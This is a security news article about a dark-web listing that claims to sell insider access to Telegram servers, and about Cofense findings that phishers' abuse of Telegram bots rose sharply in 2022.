Threat actors assert that they can give insider access to Telegram servers, which run the encrypted instant messaging application favored by a security-conscious clientele, for a non-negotiable fee of $20,000 per server.
The advertisement, which the researchers at SafetyDetectives found on a Dark Web marketplace, advertises that the access is high-level and given “via their personnel.”
The SafetyDetectives team said that the merchant is peddling “an offering of correspondence for six months” as opposed to giving remote access.
The article stated that “it is impossible to say how many users, or Telegram servers, may be disrupted.” However, if the vendor’s allegations are true, a user inside the internal Telegram network might compromise user data and exfiltrate logs.
Meanwhile, it appears like Telegram may have a larger phishing issue.
Explosion of phishing on Telegram
The revelation follows the publication of fresh data from Cofense that demonstrates how threat actors used malicious HTML attachments to deliver credential phishing attempts, causing Telegram bot abuse to increase by 800% in 2022. Because they are free and simple to set up and manage, Telegram bots are also appealing to spear-phishers.
The ease of putting up bots in a private or group chat, the bots’ compatibility with a variety of programming languages, and the ease of integration into malevolent media like malware or credential phishing kits are all praised by threat actors, according to the Cofense analysis. By combining the simplicity of setting up and using a Telegram bot with the well-known and effective method of attaching an HTML credential phishing file to an email, a threat actor can reach inboxes quickly and effectively while leaking credentials to a single point using a frequently trusted service.
How many users or Telegram servers may be impacted is unknown. But if the vendor’s assertions are true, a Telegram insider may corrupt user data and exfiltrate records across the internal network. The company’s privacy USP (i.e., Telegram’s reputation as a secure chat app) would likewise be weakened by a hypothetical intrusion in this way. The trader also maintains that there has been no hacking.